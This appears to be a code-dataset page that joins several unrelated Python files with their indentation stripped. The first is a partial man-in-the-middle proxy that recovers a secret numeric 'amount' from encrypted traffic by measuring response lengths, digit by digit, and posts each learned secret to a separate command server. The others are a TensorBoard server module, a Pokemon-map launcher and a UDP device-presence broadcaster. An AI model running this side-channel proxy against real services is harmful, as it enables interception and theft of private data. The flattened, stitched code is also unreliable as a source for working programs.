if direction == CLIENT2SERVER:
# log("-> %d ->" % len(buff))
pass
elif direction == SERVER2CLIENT:
try:
log("<- [%d] last digit = %s <-" % (len(buff), str(last_digit)))
if cur_state == 0 or cur_state == 1:
cur_state += 1
send_command(shared)
elif cur_state == 2:
cur_length = len(buff)
cur_state = 3
send_command(shared)
elif cur_state == 3:
if len(buff) == ERROR_MARK:
digit_found = 0
log("[MITM] found next digit: %s" % str(digit_found))
amount_detected += str(digit_found)
cur_amount_len += 1
if cur_amount_len < MAX_AMOUNT_LEN:
next_digit = 0
cur_state = 0
if cur_amount_len == MAX_AMOUNT_LEN - 1:
last_digit = True
send_command(shared)
else:
log("[MITM] found amount: %s" % amount_detected)
cur_state = 4
finish = {"type": "learned", "variable": "amount", "secret": int(amount_detected)}
shared.put(finish, block=True)
time.sleep(1)
finish = {"type": "done"}
shared.put(finish, block=True)
else:
cur_state += 1
send_command(shared)
elif cur_state == 4:
if ((len(buff) < cur_length and not last_digit)
or (len(buff) > cur_length and last_digit)):
digit_found = (10 - next_digit) if last_digit else next_digit
log("[MITM] found next digit: %s" % str(digit_found))
amount_detected += str(digit_found)
cur_amount_len += 1
if cur_amount_len < MAX_AMOUNT_LEN:
next_digit = 0
cur_state = 0
if cur_amount_len == MAX_AMOUNT_LEN - 1:
last_digit = True
send_command(shared)
else:
log("[MITM] found amount: %s" % amount_detected)
cur_state = 4
finish = {"type": "learned", "variable": "amount", "secret": int(amount_detected)}
shared.put(finish, block=True)
time.sleep(1)
finish = {"type": "done"}
shared.put(finish, block=True)
else:
cur_state = 3
send_command(shared)
# log("<- %d [%d] <-" % (len(buff), cur_message))
except Exception:
log(traceback.format_exc())
return buff
@contextmanager
def ignored(*exceptions):
try:
yield
except exceptions:
pass
def kill_p(a, b):
with ignored(Exception):
a.shutdown(socket.SHUT_RDWR)
a.close()
b.shutdown(socket.SHUT_RDWR)
b.close()
return
def worker(client, server, n, shared):
while running:
b = ""
with ignored(Exception):
b = client.recv(4096)
if len(b) == 0:
kill_p(client, server)
return
try:
b = mitm(b, n, shared)
except Exception:
pass
try:
server.send(b)
except Exception:
pass
kill_p(client, server)
return
kill_p(client, server)
return
def signal_handler(sn, sf):
global running
running = False
def do_proxy_main(port, remote_host, remote_port):
signal.signal(signal.SIGTERM, signal_handler)
workers = []
p = None
try:
shared = Queue()
p = threading.Thread(target=send_input, args=(args.c, args.d, shared))
p.start()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", port))
s.listen(1)
send_command(shared)
while running:
k, a = s.accept()
v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
v.connect((remote_host, remote_port))
t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER, shared))
t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT, shared))
t2.start()
t1.start()
workers.append((t1, t2, k, v))
except Exception:
pass
signal_handler(None, None)
for t1, t2, k, v in workers:
kill_p(k, v)
t1.join()
t2.join()
p.join()
return
def send_input(host, port, shared):
global running
while running:
try:
d = shared.get(block=True, timeout=1)
time.sleep(0.1)
r = requests.post("http://" + host + ":" + str(port), data={'REQUEST': json.dumps(d)})
log(r.text)
except Exception:
pass
time.sleep(0.25)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Proxy')
parser.add_argument('-p', type=int, default=4000, help="listen port")
parser.add_argument('-s', type=str, default="127.0.0.1", help="server ip address")
parser.add_argument('-q', type=int, default=3000, help="server port")
parser.add_argument('-c', type=str, default="127.0.0.1", help="command server")
parser.add_argument('-d', type=int, default=5000, help="command port")
args = parser.parse_args()
print("started")
sys.stdout.flush()
do_proxy_main(args.p, args.s, args.q)
|
server.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.AUDIO: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 50,
}
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
for specification in logdir.split(','):
# If it's a gcs path, don't split on colon
if gcs.IsGCSPath(specification):
run_name = None
path = specification
# If the spec looks like /foo:bar/baz, then we assume it's a path with a
# colon.
elif ':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if not gcs.IsGCSPath(path):
path = os.path.realpath(path)
files[path] = run_name
return files
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
multiplexer.Reload()
duration = time.time() - start
logging.info('Multiplexer done loading. Load took %0.1f secs', duration)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
for path in path_to_run.keys():
if gcs.IsGCSPath(path):
gcs.CheckIsSupported()
logging.info(
'Assuming %s is intended to be a Google Cloud Storage path because '
'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
'/.%s instead)', path, gcs.PATH_PREFIX, path)
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon_threads = True
def BuildServer(multiplexer, host, port):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer)
return ThreadedHTTPServer((host, port), factory)
|
runserver.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import webbrowser
import os
import logging
import subprocess
from threading import Thread
from pogom import config
from pogom.app import Pogom
from pogom.utils import load_credentials
from pogom.search import search_loop
from pogom.models import create_tables, Pokemon, Pokestop, Gym
from pogom.pgoapi.utilities import get_pos_by_name
log = logging.getLogger(__name__)
def start_locator_thread(auth,username,password,location,steps):
search_thread=Thread(target=search_loop, args=(auth,username,password,location,steps,))
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def run(auth,username,password,location,steps):
logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s')
logging.getLogger("peewee").setLevel(logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.WARNING)
logging.getLogger("pogom.pgoapi.rpc_api").setLevel(logging.INFO)
create_tables()
url='http://localhost:5000'
webbrowser.open_new(url)
position = get_pos_by_name(location)
log.info('Parsed location is: {:.4f}/{:.4f}/{:.4f} (lat/lng/alt)'.
format(*position))
config['ORIGINAL_LATITUDE'] = position[0]
config['ORIGINAL_LONGITUDE'] = position[1]
config['LOCALE'] = "en"
start_locator_thread(auth,username,password,location,steps)
app = Pogom(__name__)
config['ROOT_PATH'] = app.root_path
debug=False
host='127.0.0.1'
port=5000
config['GMAPS_KEY'] = load_credentials(os.path.dirname(os.path.realpath(__file__)))['gmaps_key']
app.run(threaded=True, debug=debug, host=host, port=port)
|
devices.py |
"""
This module holds Devices related components.
A 'Device' is any computer running the clientapp or the serverapp
"""
import logging
from ConfigParser import SafeConfigParser
import config as config
import time
from player import LocalPlayer, RemotePlayer
from socket import *
import select
import os
import threading
class Capability:
ProvideContent="ProvideContent"
PlayMusic="PlayMusic"
PlayVideo="PlayVideo"
SyncToStream="SyncToStream"
class DeviceManager:
"""
Keeps a registry of known devices.
"""
def __init__(self, startWatcher = False, watcher = None):
self.parser = SafeConfigParser()
self.activeDevice = None
self.bindEvents(startWatcher, watcher)
#TODO : Load hostname and port from config
self.deleteRegistry()
self.registerLocalDevice()
def registerLocalDevice(self):
self.registerDevice(Device("local","My player", "localhost"))
def bindEvents(self, startWatcher, watcher = None):
self.deviceWatcher = None
if startWatcher:
if watcher:
self.deviceWatcher = watcher
else:
self.deviceWatcher = DeviceWatcher(callback=self.handleDeviceNotificationReceived)
self.deviceWatcher.start()
def handleDeviceNotificationReceived(self, msg):
"""
TODO : Move this.
This method is triggered each time another device
on the network broadcasted it's presence.
If the device is already present in the devices registry,
updates the device-last-seen field in the registry.
If the device is not yet in the registry,
add it and set device-last-seen to now.
"""
device = Device.fromEncodedString(msg)
self.registerDevice(device)
def getDevices(self):
"""
Read all configured devices from the registry.
If the registry could not be read, return None
If no devices were found in the registry, return an empty array
otherwise return an array of Devices.
"""
devices = []
filesRead = self.parser.read(config.getFullFileName("devices.ini"))
if len(filesRead) == 0:
if not self.createRegistry():
return
for device in self.parser.sections():
url = self.parser.get(device, 'url').encode("utf-8")
lastSeen = self.parser.get(device, 'lastSeen')
visibleName = self.parser.get(device, 'visibleName').encode("utf-8")
type = self.parser.get(device, 'type').encode("utf-8")
device = Device(type, visibleName, url, lastSeen)
devices.append(device)
return devices
def getLikelyActiveDevices(self):
return self.getDevices()
def registerDevice(self, device):
"""
Register or update the specified device. Devices are stored into the file devices.ini
from the config folder.
"""
if not config.workspaceIsSet():
print "Cannot register a device when the workspace is not set."
return False
if not isinstance(device, Device):
error = "The specified device argument must inherit from the type devices.Device."
logging.info(error)
raise TypeError(error)
filesRead = self.parser.read(config.getFullFileName("devices.ini"))
if len(filesRead) == 0:
print "The DeviceManager is creating the registry..."
if not self.createRegistry():
print "The DeviceManager could not create the registry."
return False
currentDevices = self.getDevices()
if not currentDevices == None and device in currentDevices:
self.updateDeviceLastSeenTime(device)
return True
sectionName = device.visibleName
self.parser.add_section(sectionName)
self.parser.set(sectionName, 'visibleName', device.visibleName)
self.parser.set(sectionName, 'url', device.url)
self.parser.set(sectionName, 'type', device.type)
self.parser.set(sectionName, 'lastSeen', str(device.lastSeen))
with open(config.getFullFileName("devices.ini"),'w') as f:
self.parser.write(f)
print "Added device to the registry: {0} {1}".format(device.visibleName, device.url)
return True
def printRegisteredDevices(self):
for device in self.getDevices():
print device.visibleName
def getActivePlayer(self):
activeDevice = self.getActiveDevice()
if activeDevice == None:
print "There is no active player to select."
return
def getActiveDevice(self):
if self.activeDevice == None:
devices = self.getDevices()
if not devices:
return None
for device in devices:
if device.type == "local":
print "No device were selected. Using local device '{0}' as default.".format(device.visibleName)
self.activeDevice = device
break
return self.activeDevice
def getActiveDeviceType(self):
activeDev = self.getActiveDevice()
if activeDev:
return activeDev.type
else :
return None
def setActiveDevice(self, device):
print "Set '{0}' as active device.".format(device.visibleName)
self.activeDevice = device
def setActiveDeviceCapabilities(self, capabilities = []):
activeDevice = self.getActiveDevice()
if activeDevice:
return activeDevice.setCapabilities(capabilities)
return False
def updateDeviceLastSeenTime(self, device):
filesRead = self.parser.read(config.getFullFileName("devices.ini"))
if len(filesRead) == 0:
error = "The DeviceManager could not load it's configuration file: {0}".format(config.getFullFileName("devices.ini"))
logging.error(error)
raise Exception(error)
else:
sectionName = device.visibleName
lastSeen = device.lastSeen
self.parser.set(sectionName, 'lastSeen', str(lastSeen))
with open(config.getFullFileName("devices.ini"),'w') as f:
self.parser.write(f)
#print "Updated device lastSeen time: {0}".format(lastSeen)
def createRegistry(self):
try:
print "Creating device registry: {0}".format(config.getFullFileName("devices.ini") or 'Undefined')
with open(config.getFullFileName("devices.ini"), 'w+') as f:
print f
return True
except Exception as e:
print e
return False
def isWatching(self):
if self.deviceWatcher:
return self.deviceWatcher.isRunning()
else:
return False
def deleteRegistry(self):
try:
self.parser = SafeConfigParser()
with open(config.getFullFileName("devices.ini"),'w') as f:
self.parser.write(f)
return True
except Exception as e:
print e
return False
def dispose(self):
print "Disposing DeviceManager..."
if self.deviceWatcher:
self.deviceWatcher.stop()
class DeviceWatcher():
"""
Watch for other devices presence broadcasts.
"""
def __init__(self, portToWatch = 5555, callback = None):
self.portToWatch = portToWatch or config.getProperty("presence_watcher_watched_port")
self.running = False
self.bufferSize = 1024
self.callback = callback
self.sock = socket(AF_INET, SOCK_DGRAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', self.portToWatch))
self.thread = threading.Thread(target=self._run, name="watcher")
def setCallbackFunc(self, callback):
self.callback = callback
def start(self):
print "Starting to watch for devices UDP broadcasts on port: {0}...".format(self.portToWatch)
self.running = True
self.thread.start()
def isRunning(self):
return self.running
def stop(self):
print "Stopping DeviceWatcher..."
self.running = False
self.sock.close()
print "Stopped DeviceWatcher."
def _run(self):
print "Started DeviceWatcher."
try:
while self.running:
data, addr = self.sock.recvfrom(self.bufferSize)
if self.callback:
self.callback(data)
finally:
self.sock.close()
def getProcName(self):
return self.thread.name
class DevicePresenceBroadcaster():
"""
Notify other devices the presence of this device.
"""
def __init__(self, thisDevice, portToTarget = 5555, delayBetweenBroadcastsInSec = 5):
self.port = portToTarget or config.getProperty("presence_broadcaster_target_port")
self.delay = delayBetweenBroadcastsInSec or config.getProperty("presence_broadcaster_call_delay_seconds")
self.thisDevice = thisDevice
self.running = False
self.sock = socket(AF_INET, SOCK_DGRAM)
self.sock.bind(('', 0))
self.sock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.thread = threading.Thread(target=self._run, name="broadcaster")
def start(self):
print "Starting PresenceBroadcaster with delay =", self.delay, "seconds"
self.running = True
self.thread.start()
def isRunning(self):
return self.running
def stop(self):
print "Stopping DevicePresenceBroadcaster..."
self.running = False
self.sock.close()
print "Stopped PresenceBroadcaster."
def _run(self):
print "Started PresenceBroadcaster."
try:
while self.running:
try:
data = self.thisDevice.encodeForTransport()
self.sock.sendto(data, ('<broadcast>', int(self.port)))
print "Broadcasting {0} presence on UDP port: {1}".format(self.thisDevice.visibleName, self.port)
except Exception as e:
print e
#Wait if broadcaster is running
if self.running:
time.sleep(self.delay)
finally:
self.stop()
def getProcName(self):
return self.thread.name
class Device:
"""
A 'Device' is any computer running the clientapp or the serverapp
"""
def __init__(self, type="local", visibleName = None, url = None, lastSeen = None, capabilities = None):
self.visibleName = visibleName
self.url = url or "0:0"
self.lastSeen = lastSeen or time.localtime()
self.type = type
self.capabilities = capabilities or []
if ':' in url:
self.host, self.port = url.split(':')
else:
self.host = url
def isLikelyActive(self):
lastSeenTime = time.fromtimestamp(self.lastSeen)
print time.localtime() - lastSeenTime
return False
@staticmethod
def fromEncodedString(encodedString):
"""
Copy constructor for Device object encoded wit hencodeForTransport
"""
visibleName, url, capabilities = Device.decode(encodedString)
return Device("remote", visibleName=visibleName, url=url, capabilities=capabilities)
def __eq__(self, other):
return (isinstance(other, self.__class__)
and self.visibleName == other.visibleName)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return self.visibleName + " [{0}]".format(self.type)
def __str__(self):
return self.visibleName, self.url
def encodeForTransport(self):
"""
Encode this device to a string for transport via tcp
@param capabilities a string with format: 'capability1 | capability 2 | ...'
@return { 'deviceName'; 192.168.1.1:80; capabilities }
"""
capabilityString = ""
for cap in self.capabilities:
capabilityString = capabilityString + cap + "|"
#Remove trailing '|'
capabilityString = capabilityString[:-1]
encodedDevice = "{0};{1};{2}".format(self.visibleName, self.url, capabilityString)
print encodedDevice
return encodedDevice
@staticmethod
def decode(encodedString):
print encodedString
args = encodedString.split(';')
name = args[0]
url = args[1]
capabilities = args[2].split('|')
return name, url, capabilities
def setCapabilities(self, capabilities):
self.capabilities = capabilities
def testPresenceBroadcaster():
thisDevice = Device(url="localhost:5000", visibleName="test-device")
bc = DevicePresenceBroadcaster(thisDevice, delayBetweenBroadcastsInSec=1)
watcher = DeviceWatcher()
watcher.start()
bc.start()
time.sleep(5)
bc.stop()
watcher.stop()
if __name__ == '__main__':
config.setConfigFolder('../config/')
testPresenceBroadcaster()
#man = DeviceManager()
# man.handleDeviceNotificationReceived("rpi-yam","192.168.1.127:5005")
#print man.printRegisteredDevices()
def startPresenceBroadcaster():
from devices import Device
thisDevice = Device("rpi")
PRESENCE_BROADCASTER = DevicePresenceBroadcaster(thisDevice)
PRESENCE_BROADCASTER.start()
def stopPresenceBroadcaster():
if PRESENCE_BROADCASTER:
PRESENCE_BROADCASTER.stop()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.